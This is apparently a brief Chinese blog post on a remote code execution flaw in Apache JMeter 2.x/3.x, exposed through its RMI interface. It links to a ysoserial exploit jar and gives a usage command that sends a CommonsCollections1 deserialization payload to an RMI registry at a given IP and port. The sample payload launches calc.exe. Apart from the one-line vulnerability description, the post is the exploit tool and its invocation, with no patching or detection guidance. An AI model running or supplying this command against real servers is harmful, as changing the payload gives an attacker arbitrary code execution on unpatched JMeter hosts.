简要说明

Apache JMeter是美国阿帕奇(Apache)软件基金会的一套使用Java语言编写的用于压力测试和性能测试的开源软件。
Apache JMeter 2.x版本和3.x版本中存在安全漏洞。攻击者可利用该漏洞获取JMeterEngine的访问权限并发送未授权的代码。

https://jitpack.io/com/github/fr … 0.5-gb617b7b-16.jar

文件下载链接

命令使用方法

java -cp ysoserial-0.0.5-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 192.168.153.132 1099 CommonsCollections1calc.exe

发表评论

电子邮件地址不会被公开。 必填项已用*标注